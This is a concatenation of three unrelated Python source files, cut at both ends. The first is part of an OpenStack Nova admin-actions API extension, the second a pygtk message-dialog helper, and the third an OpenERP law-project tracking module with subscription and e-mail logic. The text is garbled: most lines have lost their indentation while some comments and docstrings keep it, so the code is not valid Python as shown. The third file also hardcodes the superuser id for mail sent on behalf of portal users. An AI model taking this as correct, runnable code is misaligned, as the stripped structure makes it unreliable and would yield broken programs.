raise exc.HTTPBadRequest(explanation=e.format_message())
except Exception as e:
LOG.exception(_LE("Error in migrate %s"), e)
raise exc.HTTPBadRequest()
return webob.Response(status_int=202)
@wsgi.action('resetNetwork')
def _reset_network(self, req, id, body):
"""Permit admins to reset networking on a server."""
context = req.environ['nova.context']
authorize(context, 'resetNetwork')
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.reset_network(context, instance)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::reset_network %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('injectNetworkInfo')
def _inject_network_info(self, req, id, body):
"""Permit admins to inject network info into a server."""
context = req.environ['nova.context']
authorize(context, 'injectNetworkInfo')
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.inject_network_info(context, instance)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::inject_network_info %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('lock')
def _lock(self, req, id, body):
"""Lock a server instance."""
context = req.environ['nova.context']
authorize(context, 'lock')
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.lock(context, instance)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::lock %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('unlock')
def _unlock(self, req, id, body):
"""Unlock a server instance."""
context = req.environ['nova.context']
authorize(context, 'unlock')
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.unlock(context, instance)
except exception.PolicyNotAuthorized as e:
raise webob.exc.HTTPForbidden(explanation=e.format_message())
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::unlock %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('createBackup')
def _create_backup(self, req, id, body):
"""Backup a server instance.
Images now have an `image_type` associated with them, which can be
'snapshot' or the backup type, like 'daily' or 'weekly'.
If the image_type is backup-like, then the rotation factor can be
included and that will cause the oldest backups that exceed the
rotation factor to be deleted.
"""
context = req.environ["nova.context"]
authorize(context, 'createBackup')
entity = body["createBackup"]
try:
image_name = entity["name"]
backup_type = entity["backup_type"]
rotation = entity["rotation"]
except KeyError as missing_key:
msg = _("createBackup entity requires %s attribute") % missing_key
raise exc.HTTPBadRequest(explanation=msg)
except TypeError:
msg = _("Malformed createBackup entity")
raise exc.HTTPBadRequest(explanation=msg)
try:
rotation = int(rotation)
except ValueError:
msg = _("createBackup attribute 'rotation' must be an integer")
raise exc.HTTPBadRequest(explanation=msg)
if rotation < 0:
msg = _("createBackup attribute 'rotation' must be greater "
"than or equal to zero")
raise exc.HTTPBadRequest(explanation=msg)
props = {}
metadata = entity.get('metadata', {})
common.check_img_metadata_properties_quota(context, metadata)
try:
props.update(metadata)
except ValueError:
msg = _("Invalid metadata")
raise exc.HTTPBadRequest(explanation=msg)
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
image = self.compute_api.backup(context, instance, image_name,
backup_type, rotation, extra_properties=props)
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'createBackup', id)
resp = webob.Response(status_int=202)
# build location of newly-created image entity if rotation is not zero
if rotation > 0:
image_id = str(image['id'])
image_ref = os.path.join(req.application_url, 'images', image_id)
resp.headers['Location'] = image_ref
return resp
@wsgi.action('os-migrateLive')
def _migrate_live(self, req, id, body):
"""Permit admins to (live) migrate a server to a new host."""
context = req.environ["nova.context"]
authorize(context, 'migrateLive')
try:
block_migration = body["os-migrateLive"]["block_migration"]
disk_over_commit = body["os-migrateLive"]["disk_over_commit"]
host = body["os-migrateLive"]["host"]
except (TypeError, KeyError):
msg = _("host, block_migration and disk_over_commit must "
"be specified for live migration.")
raise exc.HTTPBadRequest(explanation=msg)
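        # strict=True makes bool_from_string raise ValueError for anything that
        # is not an unambiguous boolean string instead of defaulting to False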
try:
block_migration = strutils.bool_from_string(block_migration,
strict=True)
disk_over_commit = strutils.bool_from_string(disk_over_commit,
strict=True)
except ValueError as err:
raise exc.HTTPBadRequest(explanation=six.text_type(err))
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.live_migrate(context, instance, block_migration,
disk_over_commit, host)
except (exception.NoValidHost,
exception.ComputeServiceUnavailable,
exception.InvalidHypervisorType,
exception.InvalidCPUInfo,
exception.UnableToMigrateToSelf,
exception.DestinationHypervisorTooOld,
exception.InvalidLocalStorage,
exception.InvalidSharedStorage,
exception.HypervisorUnavailable,
exception.InstanceNotRunning,
exception.MigrationPreCheckError) as ex:
raise exc.HTTPBadRequest(explanation=ex.format_message())
except exception.InstanceNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'os-migrateLive', id)
except Exception:
if host is None:
msg = _("Live migration of instance %s to another host "
"failed") % id
else:
msg = _("Live migration of instance %(id)s to host %(host)s "
"failed") % {'id': id, 'host': host}
LOG.exception(msg)
# Return messages from scheduler
raise exc.HTTPBadRequest(explanation=msg)
return webob.Response(status_int=202)
@wsgi.action('os-resetState')
def _reset_state(self, req, id, body):
"""Permit admins to reset the state of a server."""
context = req.environ["nova.context"]
authorize(context, 'resetState')
# Identify the desired state from the body
try:
state = state_map[body["os-resetState"]["state"]]
except (TypeError, KeyError):
msg = _("Desired state must be specified. Valid states "
"are: %s") % ', '.join(sorted(state_map.keys()))
raise exc.HTTPBadRequest(explanation=msg)
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
instance.vm_state = state
instance.task_state = None
instance.save(admin_state_reset=True)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::resetState %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
class Admin_actions(extensions.ExtensionDescriptor):
"""Enable admin-only server actions
Actions include: pause, unpause, suspend, resume, migrate,
resetNetwork, injectNetworkInfo, lock, unlock, createBackup
"""
name = "AdminActions"
alias = "os-admin-actions"
namespace = "http://docs.openstack.org/compute/ext/admin-actions/api/v1.1"
updated = "2011-09-20T00:00:00Z"
def get_controller_extensions(self):
controller = AdminActionsController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
|
import pygtk
pygtk.require('2.0')
import gtk
class messages:
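    """Thin wrappers around gtk.MessageDialog for error, info and yes/no
    question pop-ups; each helper shows the dialog, blocks until it is
    dismissed and then destroys it."""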
def __init__(self):
# Dialog - Flags
# DIALOG_MODAL - make the dialog modal
# DIALOG_DESTROY_WITH_PARENT - destroy dialog when its parent is destroyed
# DIALOG_NO_SEPARATOR - omit the separator between the vbox and the action_area
self.Buttons = {}
#
def errorMsg(self, sText):
# gtk
ok = False
print 'errorMsg'
        dialog = gtk.MessageDialog(None, gtk.DIALOG_DESTROY_WITH_PARENT,
                                   gtk.MESSAGE_ERROR, gtk.BUTTONS_CLOSE, sText)
        dialog.run()
        dialog.destroy()
return ok
def infoMsg(self, sText):
# gtk
ok = False
print 'infoMsg'
        dialog = gtk.MessageDialog(None, gtk.DIALOG_DESTROY_WITH_PARENT,
                                   gtk.MESSAGE_INFO, gtk.BUTTONS_OK, sText)
        dialog.run()
        dialog.destroy()
return ok
def QuestionMsg(self, sText):
# gtk
ok = False
print 'QuestionMsg'
        dialog = gtk.MessageDialog(None, gtk.DIALOG_DESTROY_WITH_PARENT,
                                   gtk.MESSAGE_QUESTION, gtk.BUTTONS_YES_NO, sText)
        response = dialog.run()
        dialog.destroy()
print 'Response', response
if response == gtk.RESPONSE_YES:
ok = True
return ok
|
# -*- coding: utf-8 -*-
import re
from openerp import netsvc
from datetime import datetime, date, timedelta
import time
from openerp.osv import osv, fields
from dateutil import relativedelta
from openerp import SUPERUSER_ID, tools
from openerp.tools.translate import _
from urllib import urlencode
import pytz
from urlparse import urljoin
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP, float_compare
_PROJECT_STATE = [('draft', 'New'),('open', 'In Progress'),('pending', 'Pending'), ('done', 'Done'), ('cancelled', 'Cancelled')]
class law_tracking_stage(osv.osv):
_name = 'law_tracking.stage'
_description = 'Law Project Stage'
_order = 'sequence'
_columns = {
'name': fields.char('Stage Name', required=True, size=64, translate=True),
'description': fields.text('Description'),
'sequence': fields.integer('Sequence'),
'state': fields.selection(_PROJECT_STATE, 'Related Status', required=True,
help="The status of your document is automatically changed regarding the selected stage. " \
"For example, if a stage is related to the status 'Close', when your document reaches this stage, it is automatically closed."),
# Seems that we are no longer using this field
# 'case_default': fields.boolean('Default for New Projects',
# help="If you check this field, this stage will be proposed by default on each new project. It will not assign this stage to existing projects."),
'law_project_ids': fields.many2many('law_tracking.project.type', 'law_project_stage_type_relation', 'stage_id', 'type_id', 'Law Projects'),
'fold': fields.boolean('Folded in Kanban View',
            help='This stage is folded in the kanban view when '
'there are no records in that stage to display.'),
}
_defaults = {
'sequence': 1,
# 'law_project_ids': lambda self, cr, uid, ctx=None: self.pool['law_tracking.law_project']._get_default_project_id(cr, uid, context=ctx),
}
class law_tracking_project_type(osv.osv):
_name = 'law_tracking.project.type'
_description = 'Law Project Type'
_columns = {
'name': fields.char('Name', required=True, size=64, translate=True),
'stage_ids': fields.many2many('law_tracking.stage', 'law_project_stage_type_relation', 'type_id', 'stage_id', 'Tasks Stages',),
'unicameral': fields.boolean('Unicameral?',),
# TODO use this for filtering presenter on chamber
# 'entrance_chamber': fields.selection([(u'deputies', u'Deputies'), (u'senators', u'Senators')], string='Entrance Chamber', required=True),
}
class law_project(osv.osv):
""""""
_inherit = 'law_tracking.law_project'
_order = 'entry_date desc'
def _get_default_project_id(self, cr, uid, context=None):
""" Gives default section by checking if present in the context """
return (self._resolve_project_id_from_context(cr, uid, context=context) or False)
def _resolve_project_id_from_context(self, cr, uid, context=None):
""" Returns ID of project based on the value of 'default_project_id'
context key, or None if it cannot be resolved to a single
project.
"""
if context is None:
context = {}
if type(context.get('default_project_id')) in (int, long):
return context['default_project_id']
if isinstance(context.get('default_project_id'), basestring):
project_name = context['default_project_id']
project_ids = self.pool.get('law_tracking.law_project').name_search(cr, uid, name=project_name, context=context)
if len(project_ids) == 1:
return project_ids[0][0]
return None
def get_subscriber(self, cr, uid, user_id, context=None):
user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, user_id, context=context)
partner_ids = []
if user.partner_id.is_company == True:
partner_ids = [user.partner_id.id]
elif user.partner_id.parent_id:
partner_ids = [user.partner_id.parent_id.id]
return partner_ids
def _get_subscritors(self, cr, uid, ids, name, arg, context=None):
subscription_obj = self.pool.get('law_tracking.subscription')
partner_ids = self.get_subscriber(cr, SUPERUSER_ID, uid, context)
subscription_ids = subscription_obj.search(cr, SUPERUSER_ID, [('law_project_id', 'in', ids), ('state','=','subscribed')])
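        # one entry per project id: its subscriber partners, whether the current
        # user's partner subscribes, and whether it has any subscribers at all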
res = dict((id, dict(subscriptor_ids=[], user_is_subscriptor=False, has_subscriptors=False)) for id in ids)
for subscription in subscription_obj.browse(cr, SUPERUSER_ID, subscription_ids):
res[subscription.law_project_id.id]['subscriptor_ids'].append(subscription.partner_id.id)
res[subscription.law_project_id.id]['has_subscriptors'] = (True)
            # flag the project when the current user's partner is among the subscribers
if partner_ids and subscription.partner_id.id == partner_ids[0]:
res[subscription.law_project_id.id]['user_is_subscriptor'] = True
return res
def _user_is_employee(self, cr, uid, ids, name, arg, context=None):
res = {}
# We check if user is employee
user_obj = self.pool.get('res.users')
user_group_ids = user_obj.read(cr, SUPERUSER_ID, uid, fields=['groups_id'], context=context)
m = self.pool.get('ir.model.data')
employee_group_id = m.get_object(cr, SUPERUSER_ID, 'base', 'group_user').id
is_employee = False
if employee_group_id in user_group_ids['groups_id']:
is_employee = True
for i in ids:
res[i] = is_employee
return res
def _search_subscriptors(self, cr, uid, obj, name, args, context):
sub_obj = self.pool.get('law_tracking.subscription')
res = []
for field, operator, value in args:
assert field == name
# TOFIX make it work with not in
assert operator != "not in", "Do not search message_follower_ids with 'not in'"
sub_ids = sub_obj.search(cr, SUPERUSER_ID, [('partner_id', operator, value), ('state','=','subscribed')])
# sub_ids = sub_obj.search(cr, SUPERUSER_ID, [('res_model', '=', self._name), ('partner_id', operator, value)])
res_ids = [sub.law_project_id.id for sub in sub_obj.browse(cr, SUPERUSER_ID, sub_ids)]
res.append(('id', 'in', res_ids))
return res
def _search_user_is_subscriptor(self, cr, uid, obj, name, args, context):
res = []
for field, operator, value in args:
assert field == name
partner_ids = self.get_subscriber(cr, SUPERUSER_ID, uid, context=context)
if (operator == '=' and value) or (operator == '!=' and not value): # is a follower
law_project_ids = self.search(cr, SUPERUSER_ID, [('subscriptor_ids', 'in', partner_ids)], context=context)
else: # is not a follower or unknown domain
aux_ids = self.search(cr, SUPERUSER_ID, [('subscriptor_ids', 'in', partner_ids)], context=context)
law_project_ids = self.search(cr, SUPERUSER_ID, [('id', 'not in', aux_ids)], context=context)
res.append(('id', 'in', law_project_ids))
return res
def _search_has_subscriptors(self, cr, uid, obj, name, args, context):
res = []
sub_obj = self.pool.get('law_tracking.subscription')
for field, operator, value in args:
assert field == name
project_ids = []
if (operator == '=' and value) or (operator == '!=' and not value): # has subscriptors
sub_ids = sub_obj.search(cr, SUPERUSER_ID, [('state','=','subscribed')])
for sub in sub_obj.browse(cr, SUPERUSER_ID, sub_ids):
project_ids.append(sub.law_project_id.id)
else: # is not a follower or unknown domain
aux_ids = sub_obj.search(cr, SUPERUSER_ID, [('state','=','subscribed')], context=context)
for sub in sub_obj.browse(cr, SUPERUSER_ID, aux_ids):
project_ids.append(sub.law_project_id.id)
project_ids = self.search(cr, SUPERUSER_ID, [('id', 'not in', project_ids)], context=context)
res.append(('id', 'in', project_ids))
return res
# def _get_full_name(self, cr, uid, ids, prop, args, context=None):
# res = {}
# for line in self.browse(cr, uid, ids):
# res[line.id] = line.name + ' (' + line.reference + ') ' + ' - ' + line.legislature_id.name
# return res
def name_get(self, cr, uid, ids, context=None):
# always return the full hierarchical name
res = {}
for line in self.browse(cr, uid, ids):
res[line.id] = line.name + ' - ' + line.legislature_id.name
# res[line.id] = line.name + ' (' + line.reference + ') ' + ' - ' + line.legislature_id.name
# res = self._get_full_name(cr, uid, ids, 'full_name', None, context=context)
return res.items()
def name_search(self, cr, user, name='', args=None, operator='ilike', context=None, limit=100):
if not args:
args = []
ids = set()
if name:
ids.update(self.search(cr, user, args + [('name',operator,name)], limit=(limit and (limit-len(ids)) or False) , context=context))
if not limit or len(ids) < limit:
ids.update(self.search(cr, user, args + [('reference',operator,name)], limit=limit, context=context))
if not limit or len(ids) < limit:
ids.update(self.search(cr, user, [('legislature_id.name','ilike',name)]+ args, limit=limit, context=context))
ids = list(ids)
else:
ids = self.search(cr, user, args, limit=limit, context=context)
result = self.name_get(cr, user, ids, context=context)
return result
def _get_user_subscription(self, cr, uid, ids, name, args, context=None):
subscription_obj = self.pool.get('law_tracking.subscription')
partner_ids = self.get_subscriber(cr, SUPERUSER_ID, uid, context)
subscription_ids = subscription_obj.search(cr, SUPERUSER_ID, [('law_project_id', 'in', ids), ('partner_id','in',partner_ids)])
res = {}
subscription_id = False
subscription_state = False
if subscription_ids:
subscription_id = subscription_ids[0]
subscription_state = subscription_obj.browse(cr, uid, subscription_ids[0], context).state
res = dict((id, dict(user_subscription_id=subscription_id, user_subscription_state=subscription_state)) for id in ids)
return res
_columns = {
        'create_date': fields.datetime('Creation Date', readonly=True),
        'create_uid': fields.many2one('res.users', 'Created by', readonly=True,),
'block_id': fields.related('presenter_id', 'partner_id', 'block_id', relation='law_tracking.block', type='many2one', string='Block', readonly=True),
'block_representatives_perc': fields.related('presenter_id','block_representatives_perc', string='Block Rep. %%',),
'block_representatives': fields.related('presenter_id','block_representatives', type='integer', string='Block Rep.', help='Block Representatives', readonly=True, ),
'total_members': fields.related('presenter_id','total_members', type='integer', string='Blocks Total.', readonly=True, ),
# 'block_id': fields.related('presenter_id', 'partner_id', 'block_id', relation='law_tracking.block', type='many2one', string='Block', readonly=True),
# 'full_name': fields.function(_get_full_name, type='char', string='Full Name', readonly=True),
'user_subscription_id': fields.function(_get_user_subscription, type='many2one', relation='law_tracking.subscription', string='Subscription', readonly=True, multi='_get_user_subscription'),
'user_subscription_state': fields.function(_get_user_subscription, type='selection', selection=[
# State machine: basic
('required','Required'),
('subscribed','Subscribed'),
('unsubscribed','Unsubscribed'),
('cancelled','Cancelled'),
],
string='Subscription State', multi='_get_user_subscription'),
'subscriptor_ids': fields.function(_get_subscritors, readonly=True,
fnct_search=_search_subscriptors, type='many2many',
obj='res.partner', string='Subscriptors', multi='_get_subscritors'),
'user_is_subscriptor': fields.function(_get_subscritors, type='boolean', string='User Is a Subscriptor', fnct_search=_search_user_is_subscriptor, multi='_get_subscritors'),
        'user_is_employee': fields.function(_user_is_employee, type='boolean', string='User Is an Employee', method=True, readonly=False),
'has_subscriptors': fields.function(_get_subscritors, type='boolean', string='Has Subscriptors', fnct_search=_search_has_subscriptors, multi='_get_subscritors'),
'open': fields.boolean('Active', track_visibility='onchange'),
'law_category_ids': fields.many2many('law_tracking.category', 'project_law_category_rel', id1='law_project_id', id2='category_id', string='Categories', required=True,),
'law_category_ids_copy': fields.related('law_category_ids', type="many2many", relation='law_tracking.category', string="Categories", readonly=True, ),
'senators_treatment_detail_ids': fields.one2many('law_tracking.enclosure_treatment_detail', 'law_project_id', domain=[('order_paper_id.chamber','=','senators')], string='Order Papers'),
'enclosure_treatment_detail_ids': fields.one2many('law_tracking.enclosure_treatment_detail', 'law_project_id', string='Order Papers'),
'sen_commission_treatment_ids': fields.one2many('law_tracking.commission_treatment', 'law_project_id', string='Senators Commission Treatment', required=True, domain=[('partner_id.chamber','=','senators')]),
# 'filtered_message_ids': fields.one2many('mail.message', 'res_id',
# domain=lambda self: [('model', '=', self._name),('type','=','notification')],
# auto_join=True,
# string='Messages',
# help="Messages and communication history"),
'sequence': fields.integer('Sequence'),
'legislature_type': fields.related('legislature_id','type', type='char', ),
'law_project_type_id': fields.many2one('law_tracking.project.type', 'Entrance Chamber', domain="[('unicameral','=',False)]", ondelete='set null', ),
# Should change the domain when statusbar widget form trunk relase (folded shown differently)
'copy_stage_id': fields.related('stage_id', type="many2one", relation='law_tracking.stage', string='Stage', readonly=True, domain="['&', ('fold', '=', False), ('law_project_ids', '=', law_project_type_id)]"),
'stage_id': fields.many2one('law_tracking.stage', 'Stage',
domain="[('law_project_ids', '=', law_project_type_id)]", track_visibility="onchange"),
'presented_by': fields.selection([
('legislator', 'Legislator'),
('executive', 'Executive'),
('judiciary', 'Judiciary'),
('popular_initiative', 'Popular Initiative'),
            ('other', 'Other'),
], string='Presented By',
required=True,),
}
def copy(self, cr, uid, id, default=None, context=None, done_list=None, local=False):
default = {} if default is None else default.copy()
law_project_rec = self.browse(cr, uid, id, context=context)
# default.update(reference=_("%s (copy)") % (law_project_rec['reference'] or ''))
default.update(reference=_("(copy)"))
default.update(name=_("(copy)"))
default.update(enclosure_treatment_detail_ids=[])
default.update(log_ids=[])
default.update(sen_commission_treatment_ids=[])
default.update(dep_commission_treatment_ids=[])
default.update(law_project_document_ids=[])
default.update(subscription_ids=[])
# default.update(reference=False)
# default.update(name=False)
return super(law_project, self).copy(cr, uid, id, default, context=context)
# Not implemented yet
# we supose that 'folded' is same as not active
def check_parlamentary_status_lost(self, cr, uid, ids=None, context=None):
if context is None:
context = {}
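        # projects still in an 'open' stage whose entry_date is more than two
        # years old lose parliamentary status and are moved to a 'pending' stage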
# date = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
date = (datetime.now() - relativedelta.relativedelta(years=2)).strftime("%Y-%m-%d")
# date = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
# new_date = datetime.now() + timedelta(months=2)
# + timedelta(days=365))
# datetime.strftime(datetime.now() + timedelta, tools.DEFAULT_SERVER_DATE_FORMAT)
# wf_service = netsvc.LocalService("workflow")
# ids = self.search(cr, uid, [('expiration_date','<=',date)])
ids = self.search(cr, uid, [('stage_id.state','=', 'open'),('entry_date','<=',date)])
# for record in self.browse(cr, uid, ids, context):
stage_ids = self.pool.get('law_tracking.stage').search(cr, uid, [('state','=','pending')])
if ids and stage_ids:
# stage
vals = {'stage_id': stage_ids[0]}
self.write(cr, uid, ids, vals, context=context)
# wf_service.trg_validate(uid, 'nautical.contract', record.id, 'sgn_expired', cr)
# print record.craft_id.id
# wf_service.trg_validate(uid, 'nautical.craft', record.craft_id.id, 'sgn_expired', cr)
return True
# return res
def _read_group_stage_ids(self, cr, uid, ids, domain, read_group_order=None, access_rights_uid=None, context=None):
stage_obj = self.pool.get('law_tracking.stage')
order = stage_obj._order
access_rights_uid = access_rights_uid or uid
if read_group_order == 'stage_id desc':
order = '%s desc' % order
search_domain = []
project_id = self._resolve_project_id_from_context(cr, uid, context=context)
if project_id:
search_domain += ['|', ('law_project_ids', '=', project_id)]
search_domain += [('id', 'in', ids)]
stage_ids = stage_obj._search(cr, uid, search_domain, order=order, access_rights_uid=access_rights_uid, context=context)
result = stage_obj.name_get(cr, access_rights_uid, stage_ids, context=context)
# restore order of the search
result.sort(lambda x,y: cmp(stage_ids.index(x[0]), stage_ids.index(y[0])))
fold = {}
for stage in stage_obj.browse(cr, access_rights_uid, stage_ids, context=context):
fold[stage.id] = stage.fold or False
return result, fold
_group_by_full = {
'stage_id': _read_group_stage_ids,
}
    # Default to True so that, on creation, an employee sees all the fields
_defaults = {
'user_is_employee':True,
'presented_by': 'legislator',
}
_sql_constraints = [
('reference_uniq', 'unique(reference)', 'Reference must be unique'),
]
def stage_find(self, cr, uid, cases, section_id, domain=[], order='sequence', context=None):
""" Override of the base.stage method
Parameter of the stage search taken from the lead:
- section_id: if set, stages must belong to this section or
be a default stage; if not set, stages must be default
stages
"""
if isinstance(cases, (int, long)):
cases = self.browse(cr, uid, cases, context=context)
# collect all section_ids
section_ids = []
if section_id:
section_ids.append(section_id)
for task in cases:
if task.project_id:
section_ids.append(task.project_id.id)
search_domain = []
if section_ids:
search_domain = [('|')] * (len(section_ids) - 1)
for section_id in section_ids:
search_domain.append(('law_project_ids', '=', section_id))
search_domain += list(domain)
stage_ids = self.pool.get('law_tracking.stage').search(cr, uid, search_domain, order=order, context=context)
if stage_ids:
return stage_ids[0]
return False
def onchange_presenter(self, cr, uid, ids, presenter_id, context=None):
v = {}
if context is None:
context = {}
if presenter_id:
legislature_member_obj = self.pool.get('law_tracking.legislature_member')
legislature_member = legislature_member_obj.browse(cr, uid, presenter_id, context=context)
if not legislature_member:
return {'value': v}
if isinstance(legislature_member, list):
legislature_member = legislature_member[0]
v['block_id'] = legislature_member.block_id.id
v['block_representatives_perc'] = legislature_member.block_representatives_perc
v['total_members'] = legislature_member.total_members
v['block_representatives'] = legislature_member.block_representatives
# project_type_unicameral = self.pool.get('law_tracking.project.type').search(cr,uid,[('unicameral','=',True)])
else:
v['block_id'] = False
v['block_representatives_perc'] = False
v['total_members'] = False
v['block_representatives'] = False
return {'value': v}
def onchange_legislature(self, cr, uid, ids, legislature_id, context=None):
v = {}
if context is None:
context = {}
if legislature_id:
legislature_obj = self.pool.get('law_tracking.legislature')
legislature = legislature_obj.browse(cr, uid, legislature_id, context=context)
if not legislature:
return {'value': v}
if isinstance(legislature, list):
legislature = legislature[0]
v['legislature_type'] = legislature.type
project_type_unicameral = self.pool.get('law_tracking.project.type').search(cr,uid,[('unicameral','=',True)])
if legislature.type == 'unicameral' and project_type_unicameral:
v['law_project_type_id'] = project_type_unicameral[0]
else:
v['law_project_type_id'] = False
else:
v['legislature_type'] = False
v['law_project_type_id'] = False
return {'value': v}
def onchange_type(self, cr, uid, ids, law_project_type_id, context=None):
v = {}
if context is None:
context = {}
if law_project_type_id:
law_project_type_obj = self.pool.get('law_tracking.project.type')
law_project_type = law_project_type_obj.browse(cr, uid, law_project_type_id, context=context)
if not law_project_type:
return {'value': v}
if isinstance(law_project_type, list):
law_project_type = law_project_type[0]
order='sequence'
stage_ids = self.pool.get('law_tracking.stage').search(cr, uid, [('law_project_ids', '=', law_project_type.id)], order=order, context=context)
            v['stage_id'] = stage_ids[0] if stage_ids else False
else:
v['stage_id'] = False
return {'value': v}
def check_suggestions(self, cr, uid, ids, context=None):
if not context:
context = {}
partner_obj = self.pool.get('res.partner')
company_obj = self.pool.get('res.company').browse(cr, uid, 1, context)
template = False
try:
template = self.pool.get('ir.model.data').get_object(cr, uid, 'law_tracking_x', 'project_suggestion_mail')
except ValueError:
raise
for law_project in self.browse(cr, uid, ids, context=context):
partner_match_ids = []
partner_ids = partner_obj.search(cr, uid, [('id','not in',[x.id for x in law_project.subscriptor_ids])])
for partner in partner_obj.browse(cr, uid, partner_ids, context=context):
partner_categ_ids = [x.id for x in partner.law_category_ids]
for law_categ in law_project.law_category_ids:
if law_categ.id in partner_categ_ids:
partner_match_ids.append(partner.id)
break
try:
ctx_partner_ids = ', '.join(str(x) for x in partner_match_ids)
context = dict(context, partner_ids=ctx_partner_ids)
context = dict(context, company_obj=company_obj)
self.pool.get('email.template').send_mail(cr, uid, template.id, law_project.id, force_send=True, raise_exception=True, context=context)
except Exception:
raise
break
partner_names = ''
for partner in partner_obj.browse(cr, uid, partner_match_ids, context=context):
partner_names += partner.name + ', '
        return self.pool.get('warning_box').info(cr, uid, title=_('Suggestions Sent'), message=_('Suggestions have been sent to: ' + partner_names))
def require_more_information(self, cr, uid, ids, context=None):
        uid = 1  # because this mail is sent by portal users; otherwise it raises an error
if not context:
context = {}
# partner_obj = self.pool.get('res.partner')
# company_obj = self.pool.get('res.company').browse(cr, uid, 1, context)
template = False
try:
template = self.pool.get('ir.model.data').get_object(cr, uid, 'law_tracking_x', 'law_project_more_information_request')
except ValueError:
raise
for law_project in self.browse(cr, uid, ids, context=context):
try:
self.pool.get('email.template').send_mail(cr, uid, template.id, law_project.id, force_send=True, raise_exception=True, context=context)
except Exception:
raise
return self.pool.get('warning_box').info(cr, uid, title=_('Information Requested'), message=_('More information has been requested.'))
# def check_suggestions_old_modified(self, cr, uid, ids, context=None):
# if not context:
# context = {}
# partner_obj = self.pool.get('res.partner')
# template = False
# signature_template = False
    # # New for using partner to send email. TODO: improve this, it is horrible!
# partner_obj = self.pool.get('res.partner')
# try:
# template = self.pool.get('ir.model.data').get_object(cr, uid, 'law_tracking_x', 'project_suggestion_mail')
# signature_template = self.pool.get('ir.model.data').get_object(cr, uid, 'law_tracking_x', 'company_signature')
# except ValueError:
# raise
# user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
# signature_mail = self.pool.get('email.template').generate_email(cr, uid, signature_template.id, user.company_id.id, context=context)
# for law_project in self.browse(cr, uid, ids, context=context):
# partner_match_ids = []
# partner_ids = partner_obj.search(cr, uid, [('id','not in',[x.id for x in law_project.subscriptor_ids])])
# for partner in partner_obj.browse(cr, uid, partner_ids, context=context):
# partner_categ_ids = [x.id for x in partner.law_category_ids]
# for law_categ in law_project.law_category_ids:
# if law_categ.id in partner_categ_ids:
# data = {
# 'partner_id': partner.id,
# 'law_project_id': law_project.id,
# }
# partner_match_ids.append(partner.id)
# # New for using partner to send email. TODO: improove this!! is horrible!
# try:
# mail = self.pool.get('email.template').generate_email(cr, uid, template.id, law_project.id, context=context)
# subtype = 'mail.mt_comment'
# body_html = mail['body_html']
# body_html = tools.append_content_to_html(mail['body_html'], signature_mail['body_html'], plaintext=False, container_tag='div')
# # partner_obj.message_post(cr, uid, [partner.id], subject=mail['subject'],
# # body=body_html, type='comment', subtype=subtype, context=context, partner_ids = [partner.id])
# # context.update['recipient_ids'] = [partner.id]
# self.pool.get('email.template').send_mail(cr, uid, template.id, law_project.id, force_send=True, raise_exception=True, context=context)
# except Exception:
# raise
# break
# # wE REPLACE THIW FOR THE "NEW"
# ## We write a notification and send this partner in context to notify them
# # context = dict(context, partner_match_ids=partner_match_ids)
# # res = self.write_comment(cr, uid, [law_project.id], 'law_tracking_x', 'project_suggestion_mail', context=context)
    # # TODO: the "sent to" message should take into account whether the for loop covers more than one project
# partner_names = ''
# for partner in partner_obj.browse(cr, uid, partner_match_ids, context=context):
# partner_names += partner.name + ', '
# return self.pool.get('warning_box').info(cr, uid, title=_('Suggestions Sent'), message=_('Suggestions has been sent to: ' + partner_names))
def write_comment(self, cr, uid, ids, module, rec_id, context=None):
""" write comment and send email """
if not context:
context = {}
# With this option we disable the signature on the email of the user that is sending the email. It also changes the footer from:
# Sent by Law Tracking using OpenERP. Access your messages and documents through our Customer Portal
# to
# Access your messages and documents through our Customer Portal
context = dict(context, mail_notify_user_signature=False)
# context = dict(context, lang='es_ES')
template = False
signature_template = False
try:
template = self.pool.get('ir.model.data').get_object(cr, uid, module, rec_id)
signature_template = self.pool.get('ir.model.data').get_object(cr, uid, 'law_tracking_x', 'company_signature')
except ValueError:
raise
